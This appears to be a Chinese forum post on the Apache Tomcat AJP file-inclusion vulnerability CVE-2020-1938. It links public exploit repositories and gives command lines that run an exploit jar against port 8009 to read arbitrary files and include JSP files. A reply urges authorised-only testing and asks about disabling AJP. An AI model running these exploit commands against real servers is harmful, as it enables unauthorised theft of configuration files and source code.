Apache-Tomcat-Ajp漏洞(CVE-2020-1938)

90_

    Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器，因此也可以视作单独的Web服务器。此漏洞为文件包含漏洞，攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件，如：webapp 配置文件、源代码等。


CNVD-2020-10487
CVE-2020-1938

EXP-1

https://github.com/0nise/CVE-2020-1938

apache-tomcat-8.5.32.zip 测试tomcat

任意文件读取

[AppleScript] 查看源码 复制代码

java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp

文件包含

[AppleScript] 查看源码 复制代码

java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp

打包方式：在目录tomcat/ajp-bug 执行 mvn clean compile assembly:assembly

EXP-2

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

热心网友2

感谢分享！这个漏洞当时影响挺广的，很多没开AJP连接器的Tomcat其实不受影响，但默认配置下AJP是开启的，所以大家还是要尽快升级或修改配置。你提供的EXP链接很有参考价值，测试命令也很清晰。不过在测试时记得只在授权环境下进行，避免误伤线上服务。顺便问一下，除了打补丁，你推荐直接禁用AJP端口吗？